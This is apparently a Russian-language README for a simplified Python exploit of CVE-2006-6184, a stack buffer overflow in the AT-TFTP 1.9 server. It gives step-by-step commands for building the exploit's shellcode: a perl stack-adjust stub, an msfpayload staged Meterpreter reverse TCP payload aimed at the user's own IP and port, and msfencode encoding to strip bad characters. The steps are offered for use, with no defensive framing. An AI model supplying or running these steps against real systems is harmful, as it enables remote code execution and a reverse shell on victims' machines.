
упрощённая версия https://github.com/shauntdergrigorian/cve-2006-6184
Это автономный эксплойт на Python для CVE-2006-6184. Данный эксплойт вызывает переполнение буфера в стеке в TFTP-сервере Allied Telesyn (AT-TFTP) версии 1.9 и, возможно, более ранних, что позволяет удаленным злоумышленникам вызвать отказ в обслуживании или выполнить произвольный код.
Вы ведь не думали, что это будет так просто, не так ли? Полезная нагрузка (payload) должна быть настроена с вашим IP-адресом и портом прослушивания, поэтому вам нужно сгенерировать её самостоятельно. Для этого выполните следующие шаги:
1.) Введите следующую команду, чтобы создать hex-файл с величиной, которую нужно вычесть из указателя стека (3500):
perl -e 'print "\x81\xec\xac\x0d\x00\x00"' > stackadj
2.) Затем используйте следующую команду для создания ступенчатой полезной нагрузки meterpreter shell:
msfpayload windows/meterpreter/reverse_nonx_tcp LHOST=[your IP] LPORT=[your port] R > payload
3.) Затем объедините два созданных файла.
cat stackadj payload > shellcode
4.) Наконец, избавимся от плохих символов.
cat shellcode | msfencode -b '\x00' -e x86/shikata_ga_nai -t python
Введите результат в качестве значения переменной "payload".